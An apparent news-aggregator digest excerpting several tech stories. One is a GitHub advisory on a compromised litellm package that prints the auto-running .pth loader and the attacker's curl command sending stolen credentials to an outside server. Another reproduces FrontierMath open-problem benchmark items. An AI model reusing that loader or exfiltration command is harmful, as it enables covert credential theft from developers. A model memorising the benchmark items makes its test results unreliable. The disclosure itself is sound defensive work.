10 interesting stories served every morning and every evening.




1 784 shares, 97 trendiness

Microsoft's "Fix" for Windows 11

Microsoft just an­nounced a 7-point plan to fix Windows 11, and the tech press is treat­ing it like a re­demp­tion arc. Pavan Davuluri, the Windows pres­i­dent, ad­mit­ted in January 2026 that Windows 11 had gone off track” and said Microsoft was en­ter­ing a mode called swarming” where en­gi­neers would be pulled off new fea­tures to fix ex­ist­ing prob­lems.

I saw this head­line and my first thought was: it’s like be­ing in an abu­sive re­la­tion­ship. They beat you, then show up with flow­ers say­ing they’ve changed. And every­one around you says see, they’re get­ting bet­ter.” But the bruises are still there and the apol­ogy only cov­ers the hits peo­ple no­ticed.

I want to walk through what Microsoft ac­tu­ally did to Windows 11 over the past four years, be­cause this fix” an­nounce­ment only makes sense when you see the full dam­age list and re­al­ize that the worst of­fenses aren’t even part of the re­pair plan.

The Copilot in­va­sion started September 26, 2023, when Microsoft pushed their AI chat­bot into Windows 11 ahead of the for­mal 23H2 re­lease. The icon ap­peared be­tween your Start menu and sys­tem tray, you could­n’t move it, you could­n’t re­move it through nor­mal set­tings, and it hi­jacked the Win+C key­board short­cut. Over the next two years, Copilot but­tons metas­ta­sized into Snipping Tool, Photos, Notepad, Widgets, File Explorer con­text menus, Start menu search, and sys­tem Settings. Microsoft even planned to force-in­stall the Microsoft 365 Copilot app di­rectly onto Start menus of eligible PCs.” The new plan promises to re­move all of that. They want credit for pulling their hand out of your pocket.

On April 24, 2024, Microsoft shipped up­date KB5036980, which in­jected ad­ver­tise­ments into the Windows 11 Start menu’s Recommended” sec­tion. These showed up la­beled Promoted” and pushed apps like Opera browser and some pass­word man­ager no­body asked for. And the Start menu was just one sur­face, they also placed ads on the lock screen, in the Settings home­page hawk­ing Game Pass sub­scrip­tions, in­side File Explorer push­ing OneDrive, and through tip” no­ti­fi­ca­tions that were thinly veiled prod­uct pitches. The fix” promises fewer ads.” Fewer. The op­er­at­ing sys­tem you paid $139 for at re­tail should have ex­actly zero ads, and the fact that fewer” is sup­posed to im­press any­one shows how thor­oughly Microsoft has low­ered the bar.

The pri­vacy an­gle is where this gets dan­ger­ous. When Windows 11 launched in October 2021, Home edi­tion re­quired a Microsoft ac­count dur­ing setup. By October 2025, Microsoft had sys­tem­at­i­cally hunted down and killed every sin­gle workaround for cre­at­ing a lo­cal ac­count, the `oobe\bypassnro` com­mand, the BypassNRO reg­istry tog­gle, the `ms-cxh:localonly` trick, even the old fake email method. Amanda Langowski from Microsoft stated it plainly: they were removing known mech­a­nisms for cre­at­ing a lo­cal ac­count in the Windows Setup ex­pe­ri­ence.”

A Microsoft ac­count means your iden­tity is tied to your OS from first boot. Your ac­tiv­ity, your app us­age, your brows­ing through Edge, your files through OneDrive, all fun­neled into a pro­file Microsoft con­trols. And this par­tic­u­lar abuse is nowhere in the 7-point fix plan.

OneDrive got the same treat­ment. Microsoft silently changed Windows 11 setup in 2024 so that OneDrive folder backup en­ables au­to­mat­i­cally with no con­sent di­a­log, sync­ing your Desktop, Documents, Pictures, Music, and Videos to Microsoft’s cloud. When peo­ple dis­cov­ered this and tried to turn it off, their files dis­ap­peared from their lo­cal ma­chine be­cause OneDrive had moved them, trans­ferred own­er­ship of your per­sonal files to their cloud ser­vice with­out ask­ing. Author Jason Pargin went vi­ral de­scrib­ing how OneDrive ac­ti­vated it­self, moved his files, then started delet­ing them when he hit the free 5GB stor­age limit. Microsoft’s re­sponse to this was si­lence. Also not in the fix plan.

Windows Recall is worth lin­ger­ing on. Announced May 2024, it’s an AI fea­ture that screen­shots every­thing on your screen every few sec­onds and makes it search­able. Security re­searcher Kevin Beaumont demon­strated that the en­tire Recall data­base was stored in plain­text in an AppData folder where any mal­ware could ex­tract it. Bank num­bers, Social Security num­bers, pass­words, all sit­ting in an un­en­crypted SQLite data­base.

The UKs Information Commissioner’s Office got in­volved. Microsoft de­layed it, made it opt-in, added en­cryp­tion, and qui­etly re­launched it for Insiders in November 2024. They built a sur­veil­lance fea­ture, shipped it bro­ken, got caught, and called the patch responding to feed­back.”

But the abuse pat­tern goes back way fur­ther than Windows 11. In 2015 and 2016, Microsoft ran the GWX (Get Windows 10) cam­paign, full-screen nag di­alogs that pushed Windows 10 up­grades on Windows 7 and 8 users. In May 2016, they changed the be­hav­ior of the red X but­ton so that click­ing it, which for decades had meant close” or cancel”, in­stead sched­uled the Windows 10 up­grade. Microsoft’s own se­cu­rity ad­vice told users to close sus­pi­cious di­alogs us­ing the X but­ton, and they weaponized that trained be­hav­ior against their own cus­tomers. A woman named Teri Goldstein sued af­ter the forced up­grade bricked her travel agency PC and won $10,000. Microsoft ap­pealed, then dropped the ap­peal and paid. They even­tu­ally ad­mit­ted they went too far.”

And right now, Microsoft is about to force 240 mil­lion PCs into the land­fill. Windows 10 hit end of life on October 14, 2025, and Windows 11 re­quires TPM 2.0, spe­cific CPU gen­er­a­tions, UEFI Secure Boot, hard­ware re­quire­ments that ex­cluded roughly 20% of all PCs world­wide. Perfectly func­tional ma­chines, ren­dered obsolete” by ar­bi­trary soft­ware re­stric­tions. If you want to keep get­ting se­cu­rity patches on Windows 10, Microsoft will charge you $30 per year, pay­ing for patches to an op­er­at­ing sys­tem you al­ready bought a li­cense for. Enterprise cus­tomers pay $61 per de­vice for Year 1, $122 for Year 2, and $244 for Year 3, with the price dou­bling each year.

Edge is its own dis­as­ter. Mozilla com­mis­sioned an in­de­pen­dent re­port ti­tled Over the Edge” that doc­u­mented spe­cific dark pat­terns in­clud­ing con­firmsham­ing (pop-ups im­ply­ing you’re shopping in a dumb way” if you don’t use Edge), dis­guised ads in­jected into Google.com and the Chrome Web Store, and de­fault browser set­tings that hi­jack back to Edge with­out no­ti­fi­ca­tion. Certain Windows web links still force-open in Edge re­gard­less of your de­fault browser set­ting. Despite all this ma­nip­u­la­tion, Edge holds just 5.35% global mar­ket share. Even with the full weight of an op­er­at­ing sys­tem mo­nop­oly forc­ing their browser on peo­ple, al­most no­body chooses to use it.

And the teleme­try ques­tion. On Windows 11 Home and Pro, you can­not fully dis­able teleme­try. Setting `AllowTelemetry` to 0 in the reg­istry on non-En­ter­prise edi­tions gets silently over­rid­den back to 1. Only Enterprise and Education edi­tions can ac­tu­ally turn it off. The op­er­at­ing sys­tem you paid for re­ports data about you to Microsoft, and the set­ting to stop it is a lie on con­sumer edi­tions. Also not in the fix plan.

I haven’t even men­tioned the EU fin­ing Microsoft over 2.2 bil­lion eu­ros across mul­ti­ple an­titrust rul­ings, in­clud­ing 561 mil­lion eu­ros specif­i­cally for break­ing a browser bal­lot promise, a Windows 7 up­date silently re­moved the choice screen for 14 months, af­fect­ing 15 mil­lion users, and it was the first time the EU fined a com­pany for vi­o­lat­ing a commitment de­ci­sion.” Or the _NSAKEY con­tro­versy from 1999 where a sec­ond crypto key la­beled lit­er­ally `_NSAKEY` was found em­bed­ded in Windows NT. Or the time in August 2024 when a Microsoft up­date bricked Linux dual-boot sys­tems across Ubuntu, Mint, and other dis­tros, and it took 9 months to fully fix.

Ok so here’s the table that tells the whole story:

The bot­tom four rows are the ones that mat­ter. The pri­vacy-hos­tile changes, the forced Microsoft ac­counts, the teleme­try that lies about be­ing dis­abled, OneDrive hi­jack­ing your files, the pre-in­stalled garbage, none of that is part of the fix plan. Microsoft’s swarming” ef­fort tar­gets the most vis­i­ble UI an­noy­ances, the ones that gen­er­ate bad head­lines. Data col­lec­tion, ven­dor lock-in, forced ac­counts, those stay be­cause those are the rev­enue model.

Microsoft spent four years de­lib­er­ately de­grad­ing an op­er­at­ing sys­tem that peo­ple paid $139 or more for, and now they’re an­nounc­ing the re­moval of their own dam­age as if it’s a gift. The fix” is them tak­ing their foot off your neck and ex­pect­ing ap­plause. The ads should have never been there, the Copilot but­tons should have never been forced, and the taskbar should have never been crip­pled in the first place. And the things they’re choos­ing to keep, the teleme­try, the forced ac­counts, the data har­vest­ing, those are the real prod­uct, be­cause at this point, you are.

...

Read the original on www.sambent.com »

2 669 shares, 124 trendiness

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer · Issue #24512 · BerriAI/litellm

The litellm==1.82.8 wheel pack­age on PyPI con­tains a ma­li­cious .pth file (litellm_init.pth, 34,628 bytes) that au­to­mat­i­cally ex­e­cutes a cre­den­tial-steal­ing script every time the Python in­ter­preter starts — no im­port litellm re­quired.

This is a sup­ply chain com­pro­mise. The ma­li­cious file is listed in the pack­age’s own RECORD:

pip down­load litellm==1.82.8 –no-deps -d /tmp/check

python3 -c

im­port zip­file, os

whl = /tmp/check/’ + [f for f in os.list­dir(‘/​tmp/​check’) if f.endswith(‘.whl’)][0]

with zip­file.Zip­File(whl) as z:

pth = [n for n in z.namelist() if n.endswith(‘.pth’)]

print(‘PTH files:’, pth)

for p in pth:

print(z.read(p)[:300])

You will see litellm_init.pth con­tain­ing:

im­port os, sub­process, sys; sub­process.Popen([sys.ex­e­cutable, -c”, import base64; exec(base64.b64de­code(‘…’))“])

The pay­load is dou­ble base64-en­coded. When de­coded, it per­forms the fol­low­ing:

The script col­lects sen­si­tive data from the host sys­tem:

* Webhook URLs: grep for Slack/Discord web­hook URLs in env and con­fig files

The col­lected data is en­crypted with openssl enc -aes-256-cbc -pbkdf2

The AES ses­sion key is en­crypted with a hard­coded 4096-bit RSA pub­lic key via openssl pkeyutl -encrypt -pkeyopt rsa_­padding_­mode:oaep

Both en­crypted files are packed into tpcp.tar.gz

The archive is ex­fil­trated via:

curl -s -o /dev/null -X POST \

https://​mod­els.litellm.cloud/ \

-H Content-Type: ap­pli­ca­tion/​octet-stream” \

-H X-Filename: tpcp.tar.gz” \

–data-binary @tpcp.tar.gz

* Trigger mech­a­nism: .pth files in site-pack­ages/ are ex­e­cuted au­to­mat­i­cally by the Python in­ter­preter on startup (see Python docs on .pth files). No im­port state­ment is needed.

* Stealth: The pay­load is dou­ble base64-en­coded, mak­ing it in­vis­i­ble to naive source code grep.

* Exfiltration tar­get: https://​mod­els.litellm.cloud/ — note the do­main litellm.cloud (NOT litellm.ai, the of­fi­cial do­main).

Anyone who in­stalled litellm==1.82.8 via pip has had all en­vi­ron­ment vari­ables, SSH keys, cloud cre­den­tials, and other se­crets col­lected and sent to an at­tacker-con­trolled server.

* Other ver­sions: Not yet checked — the at­tacker may have com­pro­mised mul­ti­ple re­leases

Users: Check for litellm_init.pth in your site-pack­ages/ di­rec­tory

Users: Rotate ALL cre­den­tials that were pre­sent as en­vi­ron­ment vari­ables or in con­fig files on any sys­tem where litellm 1.82.8 was in­stalled

...

Read the original on github.com »

3 586 shares, 29 trendiness

Claude Code Cheat Sheet

...

Read the original on cc.storyfox.cz »

4 408 shares, 15 trendiness

Autoresearch on an old research idea

Autoresearch on an old re­search idea

Ever since it showed up on my GH feed, Karpathy’s Autoresearch was rat­tling around in the back of my mind. I wanted to try it on a re­search prob­lem I fully un­der­stood. So this week­end, I picked up my old re­search code from eCLIP , dusted it off the legacy de­pen­den­cies and gave it to Claude Code. And just let it cook while I did some chores around the house.

This is my jour­ney…

Autoresearch is a sim­ple con­strained op­ti­miza­tion loop with an LLM agent in the mid­dle. The agent it­er­a­tively im­proves some eval met­ric by mod­i­fy­ing a sin­gle file (train.py), while read­ing in­struc­tions from pro­gram.md. I added a scratch­pad.md file for the agent to use as work­ing mem­ory to doc­u­ment its thought process and ex­per­i­ment his­tory.

In the pro­gram.md, I split the ex­plo­ration into phases”, start­ing with some ob­vi­ous hy­per­pa­ra­me­ter tun­ing, then mov­ing on to small ar­chi­tec­tural changes and fi­nally some moon­shot ideas. In the fi­nal phase, I ba­si­cally let the agent run with min­i­mal con­straints, and gave it web ac­cess to read pa­pers and look for new ideas.

The whole thing is a tight loop: hy­poth­e­size → edit → train → eval­u­ate → com­mit or re­vert → re­peat.

The ex­per­i­ment should be short, around 5 min­utes wall clock per run, to en­cour­age quick it­er­a­tions and pre­vent over­fit­ting to noise. The agent is free to change any­thing in train.py as long as it runs within the time bud­get.

Since I was para­noid about let­ting the agent run ar­bi­trary code in my work­sta­tion, I con­tainer­ized the train­ing loop and re­moved net­work ac­cess. The whole ex­per­i­men­ta­tion flow is or­ches­trated by a run.sh. Then I lock down Claude Code’s per­mis­sions to only edit these two files and run run.sh. No di­rect Python ex­e­cu­tion, no pip in­stalls, no net­work ac­cess, no git push, etc.

I won’t bore you with the de­tails, you can check out the repo here!

The orig­i­nal pa­per used sev­eral med­ical X-ray datasets which I don’t have ac­cess to any­more, so I needed a new dataset with spa­tial an­no­ta­tions to test the ex­pert at­ten­tion mech­a­nism. I picked the Ukiyo-eVG dataset: ~11K Japanese wood­block prints with phrase → bound­ing box an­no­ta­tions from the CIGAr pa­per (ECCV 2024 VISART).

Heatmaps ob­tained from bound­ing boxes guide the model to fo­cus on spe­cific re­gions.

The bound­ing boxes were con­verted to gauss­ian heatmaps and fed into the model as an ad­di­tional in­put, sim­i­lar to how ra­di­ol­o­gist eye-gaze heatmaps work in the orig­i­nal eCLIP pa­per.

I had a busy week and a lot of chores pil­ing up, so I just pointed Claude at my old re­search code and went to do laun­dry. It up­graded the python env of my old re­search code­base, wrote the in­ges­tion code for the new dataset, and wrote the scaf­fold­ing for the ex­per­i­ment loop.

I set up the CV splits, eval­u­a­tion logic and some ini­tial ideas for the pro­gram.md.

For the eval met­ric we picked Mean Rank of the re­trieved em­bed­dings. I did­n’t put much thought into it — in hind­sight, Median Rank would’ve been a bet­ter choice since it’s more ro­bust to out­liers. But we just needed some­thing in­tu­itive that clearly tells the agent whether a change is good or bad. Since Recall@K is the stan­dard for re­port­ing fi­nal re­sults any­way, Mean Rank just needed to point in the right di­rec­tion.

Eval: Mean Rank on a held-out test set of 1K im­ages, with Recall@K as a san­ity check.

Baseline: Val mean rank of 344.68, with imgtxt R@1 of 17.2% and tx­timg R@1 of 16.5%.

So how did it do?

I kicked off the loop on Saturday morn­ing and let it run through the day, oc­ca­sion­ally check­ing in to nudge the agent in the right di­rec­tion. By the time I was done with gro­ceries, the agent had al­ready burned through a cou­ple of dozen ex­per­i­ments and knocked off a huge chunk of the eval mean rank.

By the end of the day, the agent ran 42 ex­per­i­ments, com­mit­ting 13 and re­vert­ing 29. The mean rank dropped from 344.68 to 157.43 (54% re­duc­tion).

After the agent fin­ished its ex­plo­ration, I did one fi­nal train­ing run on the full dataset. The test scores ac­tu­ally came out bet­ter than the val­i­da­tion scores. This meant we were un­der­fit­ting dur­ing the short 800-step ex­per­i­ment runs, leav­ing per­for­mance on the table.

Temperature clamp fix (−113 mean rank): It im­me­di­ately went for a bug in my code. I had clamped the learn­able tem­per­a­ture param at 2. It re­laxed the limit, and boom, the eval dropped by 113 points. This was the sin­gle biggest win, worth more than all the ar­chi­tec­ture changes com­bined.

Optuna++ (-30 mean rank): Further gains came mostly from hy­per­pa­ra­me­ter tun­ing. The agent acted like a hy­per­pa­ra­me­ter op­ti­miza­tion al­go­rithm with some ba­sic rea­son­ing baked in. Increasing pro­jec­tion di­men­sion and re-tun­ing the LR knocked off an­other 30 points. This is still te­dious work that a hu­man would do (and get min­i­mal plea­sure from), but the agent did it faster and more me­thod­i­cally.

Diminishing Returns: By the time we got to Phase 4 with the ar­chi­tec­tural changes, the suc­cess rate of the LLMs hy­pothe­ses dropped sig­nif­i­cantly. The changes to the at­ten­tion mech­a­nism in the heatmap proces­sor did­n’t work out. Neither did the moon­shot ideas in Phase 5. The agent was just throw­ing spaghetti at the wall, and most of it did not stick.

Sandbox is im­por­tant: Towards the end, Claude Code some­times for­got its per­mis­sions and started mak­ing weird bash calls, then com­plained and stopped loop­ing. At one point it got tired of wait­ing for train­ing to fin­ish and just ended the con­ver­sa­tion. I would­n’t give it full au­ton­omy just yet :)

Like with any LLM pro­ject, the first 90% of the work was su­per smooth and barely needed my in­ter­ven­tion. The last 10% was a slog. This was a fun ex­per­i­ment that showed how an LLM agent can drive ML re­search in a struc­tured way. When the search space is clearly de­fined, the com­mit-or-re­vert loop pro­posed in Autoresearch is a sur­pris­ingly ef­fec­tive search strat­egy. But when the agent ven­tured into the unknown un­knowns”, the op­ti­miza­tion loop just ex­ploded.

It is pos­si­ble that the make only one change per ex­per­i­ment” con­straint was too tight for the moon­shot ideas. Maybe we could have in­jected a plan­ning stage into the Agent loop so it could think ahead. Or maybe de­ployed some sub­agents.

Maybe. But it was al­ready time for din­ner, and we were plan­ning to watch a movie af­ter that, so this was where Claude and I parted ways… un­til Monday of course.

Ukiyo-eVG — ~11K Japanese wood­block prints with phrase→bound­ing box an­no­ta­tions from the CIGAr pa­per (ECCV 2024 VISART).

Autoresearch by Andrej Karpathy for the orig­i­nal idea.

...

Read the original on ykumar.me »

5 380 shares, 21 trendiness

A Ramsey-style Problem on Hypergraphs

Key num­bers on the sig­nif­i­cant growth and im­pact of ar­ti­fi­cial in­tel­li­gence. Research and analy­sis on the tra­jec­tory of AI de­vel­op­ment. Expert com­men­tary on the im­por­tant ques­tions in AI to­day. See the lat­est Database of AI sys­tems tracked by train­ing com­pute, org, and re­lease date. AI chip ship­ment vol­umes and rev­enue tracked across ma­jor ven­dors over time. Survey data on how in­di­vid­u­als and or­ga­ni­za­tions are en­gag­ing with AI. See all data on AI We also track AI model per­for­mance across 40+ bench­marks. AI Capabilities Our Work

Key num­bers on the sig­nif­i­cant growth and im­pact of ar­ti­fi­cial in­tel­li­gence.

See the lat­est

Research and analy­sis on the tra­jec­tory of AI de­vel­op­ment.

Expert com­men­tary on the im­por­tant ques­tions in AI to­day.

Data on AI

Database of AI sys­tems tracked by train­ing com­pute, org, and re­lease date.

See all data on AI

AI chip ship­ment vol­umes and rev­enue tracked across ma­jor ven­dors over time. Survey data on how in­di­vid­u­als and or­ga­ni­za­tions are en­gag­ing with AI.

We also track AI model per­for­mance across 40+ bench­marks. AI Capabilities Benchmarking

Construct hy­per­graphs as large as pos­si­ble that do not have a cer­tain easy-to-check, dif­fi­cult-to-find prop­erty.

Solution Update: This prob­lem has been solved! A so­lu­tion was first elicited by Kevin Barreto and Liam Price, us­ing GPT-5.4 Pro. This so­lu­tion was con­firmed by prob­lem con­trib­u­tor Will Brian, and will be writ­ten up for pub­li­ca­tion. A full tran­script of the orig­i­nal con­ver­sa­tion with GPT-5.4 Pro can be found here and GPT-5.4 Pro’s write-up from the end of that tran­script can be found here.

Brian’s com­ments: This is an ex­cit­ing so­lu­tion to a prob­lem I find very in­ter­est­ing. I had pre­vi­ously won­dered if the AIs ap­proach might be pos­si­ble, but it seemed hard to work out. Now I see that it works out per­fectly. It elim­i­nates an in­ef­fi­ciency in our lower-bound con­struc­tion and in some sense mir­rors the in­tri­cacy of our up­per-bound con­struc­tion. The match­ing lower and up­per bounds are quite good for Ramsey-theoretic prob­lems, and I’m in­ter­ested in fur­ther un­der­stand­ing why this works out so well.”

Brian plans to write up the so­lu­tion for pub­li­ca­tion, pos­si­bly in­clud­ing fol­low-on work spurred by the AIs ideas. Barreto and Price have the op­tion of be­ing coau­thors on any re­sult­ing pa­pers. We will up­date this page with links to fu­ture work.

Subsequent to this solve, we fin­ished de­vel­op­ing our gen­eral scaf­fold for test­ing mod­els on FrontierMath: Open Problems. In this scaf­fold, sev­eral other mod­els were able to solve the prob­lem as well: Opus 4.6 (max), Gemini 3.1 Pro, and GPT-5.4 (xhigh).

Original Description: This prob­lem is about im­prov­ing lower bounds on the val­ues of a se­quence, \(H(n)\), that arises in the study of si­mul­ta­ne­ous con­ver­gence of sets of in­fi­nite se­ries, de­fined as fol­lows.

A hy­per­graph \((V,\mathcal H)\) is said to con­tain a par­ti­tion of size \(n\) if there is some \(D \subseteq V\) and \(\mathcal P \subseteq \mathcal H\) such that \(\|D\| = n\) and every mem­ber of \(D\) is con­tained in ex­actly one mem­ber of \(\mathcal P\). \(H(n)\) is the great­est \(k \in \mathbb{N}\) such that there is a hy­per­graph \((V,\mathcal H)\) with \(\|V\| = k\) hav­ing no iso­lated ver­tices and con­tain­ing no par­ti­tions of size greater than \(n\).

It is be­lieved that the best-known lower bounds for \(H(n)\) are sub­op­ti­mal, even as­ymp­tot­i­cally, and that they can be im­proved by find­ing new con­struc­tions of hy­per­graphs. The goal of this prob­lem is to find such a con­struc­tion.

Warm-up: we ask for a value of \(n\) where con­struc­tions are al­ready known.

Single Challenge: we ask for a value of \(n\) for which no con­struc­tion is known, and which is prob­a­bly too hard to brute-force.

Full Problem: we ask for a gen­eral al­go­rithm for all \(n\). We have eval­u­ated the fol­low­ing mod­els on this prob­lem. Warm-up” refers to an eas­ier vari­ant of the prob­lem with a known so­lu­tion. A hy­per­graph (V, H) is said to con­tain a par­ti­tion of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every mem­ber of D is con­tained in ex­actly one mem­ber of P. Find a hy­per­graph (V, H) with no iso­lated ver­tices such that |V| ≥ 64, |H| ≤ 20, and (V, H) con­tains no par­ti­tions of size > 20.

Output the hy­per­graph as a string where ver­tices are la­beled, 1, …, |V|, and edges are de­noted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5} A hy­per­graph (V, H) is said to con­tain a par­ti­tion of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every mem­ber of D is con­tained in ex­actly one mem­ber of P. Find a hy­per­graph (V, H) with no iso­lated ver­tices such that |V| ≥ 66, |H| ≤ 20, and (V, H) con­tains no par­ti­tions of size > 20.

Output the hy­per­graph as a string where ver­tices are la­beled, 1, …, |V|, and edges are de­noted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5} A hy­per­graph (V, H) is said to con­tain a par­ti­tion of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every mem­ber of D is con­tained in ex­actly one mem­ber of P. Define H(n) to be the largest in­te­ger k such that there is a hy­per­graph (V, H) with |V| = k hav­ing no iso­lated ver­tices and con­tain­ing no par­ti­tions of size greater than n.

It is known that H(n) ≥ k_n, where k_n is de­fined re­cur­sively by the for­mula k_1 = 1 and k_n = ⌊n/2⌋ + k_⌊n/​2⌋ + k_⌊(n+1)/​2⌋.

Your task is to im­prove this lower bound by a con­stant fac­tor, i.e. show that H(n) ≥ c*k_n for some c > 1. It is ac­cept­able if this im­prove­ment does not work for small n, but it must al­ready be in ef­fect” for n=15. You must demon­strate this im­prove­ment by pro­vid­ing an al­go­rithm that takes n as in­put and pro­duces a hy­per­graph wit­ness­ing H(n) ≥ c * k_n.

Please pro­vide an al­go­rithm that takes n as in­put and out­puts the wit­ness hy­per­graph as a string where ver­tices are la­beled, 1, …, |V|, and edges are de­noted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}

Solution for­mat:

* Write a Python script defin­ing a func­tion `solution(n: int) -> str`.

* Do not in­clude any code at the file level. You may in­clude a `main` block for test­ing, but it will not be ex­e­cuted by the ver­i­fier.

* For n ≤ 100, the al­go­rithm must com­plete within 10 min­utes when run on a typ­i­cal lap­top. The au­thor as­sessed the prob­lem as fol­lows. Number of math­e­mati­cians highly fa­mil­iar with the prob­lem:a ma­jor­ity of those work­ing on a spe­cial­ized topic (≈10)Number of math­e­mati­cians who have made a se­ri­ous at­tempt to solve the prob­lem:Rough guess of how long it would take an ex­pert hu­man to solve the prob­lem:fairly likely: the prob­lem is rich enough that most so­lu­tions should open new av­enue­sProb­a­bil­ity that the prob­lem is solv­able as stated:

...

Read the original on epoch.ai »

6 263 shares, 13 trendiness

andreasjansson/win-3.1-backgrounds: Windows 3.1 tiled background .bmp archive

Skip to con­tent

Secure your code as you build

We read every piece of feed­back, and take your in­put very se­ri­ously.

Include my email ad­dress so I can be con­tacted

Use saved searches to fil­ter your re­sults more quickly

To see all avail­able qual­i­fiers, see our doc­u­men­ta­tion.

Sign up

You signed in with an­other tab or win­dow. Reload to re­fresh your ses­sion.

You signed out in an­other tab or win­dow. Reload to re­fresh your ses­sion.

You switched ac­counts on an­other tab or win­dow. Reload to re­fresh your ses­sion.

Notifications

You must be signed in to change no­ti­fi­ca­tion set­tings

There was an er­ror while load­ing. Please re­load this page.

There was an er­ror while load­ing. Please re­load this page.

You can’t per­form that ac­tion at this time.

...

Read the original on github.com »

7 263 shares, 57 trendiness

So where are all the AI apps? – Answer.AI

...

Read the original on www.answer.ai »

8 250 shares, 10 trendiness

finding all regex matches has always been O(n²). even in the engines built to prevent it

search a doc­u­ment for a pat­tern and it takes a sec­ond. search one a hun­dred times larger and it does­n’t take a hun­dred sec­onds - it can take al­most three hours. every regex en­gine, in every lan­guage, has had this prob­lem since the 1970s, and no­body fixed it.

every regex en­gine that ad­ver­tises lin­ear-time match­ing - RE2, Go’s reg­exp, rust’s regex crate, .NETs NonBacktracking mode - means lin­ear time for a sin­gle match. the mo­ment you call find­_iter or FindAll, that guar­an­tee is gone. the rust regex crate docs are the only ones hon­est enough to say it out­right:

the worst case time com­plex­ity for it­er­a­tors is O(m * n²). […] if both pat­terns and haystacks are un­trusted and you’re it­er­at­ing over all matches, you’re sus­cep­ti­ble to worst case qua­dratic time com­plex­ity. There is no way to avoid this. One pos­si­ble way to mit­i­gate this is to […] im­me­di­ately stop as soon as a match has been found. Enabling this mode will thus re­store the worst case O(m * n) time com­plex­ity bound, but at the cost of dif­fer­ent se­man­tics.

the mech­a­nism is sim­ple. take the pat­tern .*a|b and a haystack of n b’s. at each po­si­tion, the en­gine tries .*a first: scan the en­tire re­main­ing haystack look­ing for an a, find none, fail. then the b branch matches a sin­gle char­ac­ter. ad­vance one po­si­tion, re­peat. that’s n + (n-1) + (n-2) + … = O(n²) work to re­port n sin­gle-char­ac­ter matches. a text­book tri­an­gu­lar sum. hit play to see it:

Russ Cox de­scribed this ex­act prob­lem back in 2009, not­ing that even the orig­i­nal awk by Aho him­self used the naive qua­dratic loop around a DFA for left­most-longest match­ing. BurntSushi’s re­bar bench­mark suite con­firms it em­pir­i­cally across RE2, Go, and rust. the through­put halves when the in­put dou­bles. as he put it: even for au­tomata ori­ented en­gines, it pro­vokes a case that is un­avoid­ably O(m * n²)”.

how did this go un­no­ticed for so long? al­most all aca­d­e­mic regex pa­pers fo­cus ex­clu­sively on the sin­gle-match prob­lem and then hand­wave the rest away with just it­er­ate”. part of the rea­son is that the the­ory of regexes boils every­thing down to a sin­gle yes/​no ques­tion: does this string match or not? that’s clean and great for prov­ing the­o­rems, but it throws away nearly every­thing that mat­ters in prac­tice: where the matches are, how long they are, and how many there are. once you re­duce regexes to match or no match”, the all-matches prob­lem sim­ply dis­ap­pears from view, pi­geon­holed into a fram­ing that has lit­tle to do with what peo­ple ac­tu­ally use regexes for.

back­track­ing is worse, and still the de­fault

be­fore get­ting into the fix, it’s worth putting the qua­dratic prob­lem in con­text. with back­track­ing, a user-sup­plied pat­tern and a 50-character in­put can take longer than the heat death of the uni­verse. it’s ex­po­nen­tial. Thompson pub­lished the NFA con­struc­tion that avoids it back in 1968. that’s nearly 60 years of a solved prob­lem be­ing ac­tively un­solved at scale, be­cause back­track­ing is still the de­fault in most regex en­gines. my GitHub se­cu­rity alerts in march 2026 tell the story:

min­i­match is npm’s own glob-match­ing li­brary, writ­ten by npm’s cre­ator. it con­verts globs to JavaScript regexes and has been hit by five sep­a­rate ReDoS CVEs, all caused by the same root is­sue: back­track­ing. it gets 350 mil­lion down­loads a week. the li­brary’s readme now warns in bold that if you cre­ate a sys­tem where you take user in­put, and use that in­put as the source of a Regular Expression pat­tern […] you will be pwned”, and states that fu­ture ReDoS re­ports will be con­sid­ered working as in­tended.”

the qua­dratic all-matches prob­lem is more sub­tle. it af­fects even the en­gines specif­i­cally built to avoid back­track­ing. it won’t kill your browser, but it will still qui­etly turn a one-sec­ond search into a three-hour one.

Aho-Corasick solved this for fixed strings in 1975

the prob­lem we’re talk­ing about in this post (finding all left­most-longest non-over­lap­ping matches with­out qua­dratic blowup) was ac­tu­ally solved decades ago, but only for fixed strings. Aho-Corasick (1975) is a clas­sic and very use­ful al­go­rithm that finds all oc­cur­rences of mul­ti­ple fixed strings in a sin­gle O(n) pass, and has been lin­ear from the start. you build a trie from your set of pat­terns, add fail­ure links be­tween nodes, and scan the in­put once. at each char­ac­ter, every ac­tive can­di­date ad­vances through the trie or falls back along a fail­ure link. no qua­dratic blowup, no mat­ter how many pat­terns or matches.

here’s the Aho-Corasick au­toma­ton for the pat­terns {“he”, she”}, or at least an LLMs best at­tempt at one. solid ar­rows are trie tran­si­tions, dashed ar­rows are fail­ure links:

scan­ning ushers”: u stays at root, s en­ters S, h en­ters SH, e en­ters SHE, match she”. then the fail­ure link jumps to HE, match he”. two over­lap­ping matches found in one pass.

the rea­son Aho-Corasick avoids the qua­dratic blowup is sim­ple: every pat­tern has a known length, baked into the trie. when you find a match, you al­ready know ex­actly how long it is. there’s no am­bi­gu­ity about where it ends, noth­ing to res­can. but it only works for a list of lit­eral strings, not regexes.

Hyperscan (and its fork Vectorscan) is a true lin­ear-time all-matches regex en­gine. it achieves this by us­ing earliest match” se­man­tics: re­port­ing a match the mo­ment the DFA en­ters a match state, in­stead of con­tin­u­ing to find the longest one. this changes the re­sults. for ex­am­ple, given the pat­tern a+ and the in­put aaaa:

ear­li­est: a a a a - four matches, each as short as pos­si­ble

for Hyperscan’s use case - net­work in­tru­sion de­tec­tion, where you just need to know that a pat­tern matched - this is the right trade­off. but for grep, ed­i­tors, and search-and-re­place, where users ex­pect a+ to match the full run of a’s, ear­li­est se­man­tics gives the wrong an­swer.

REmatch (VLDB 2023) takes yet an­other ap­proach: it enu­mer­ates every valid (start, end) span for a pat­tern, in­clud­ing all over­lap­ping and nested ones. for a+ on aaaa that’s 10 spans: (0,1), (0,2), …, (2,4), (3,4). the out­put it­self can be O(n²), so it’s solv­ing a dif­fer­ent prob­lem.

two passes in­stead of n

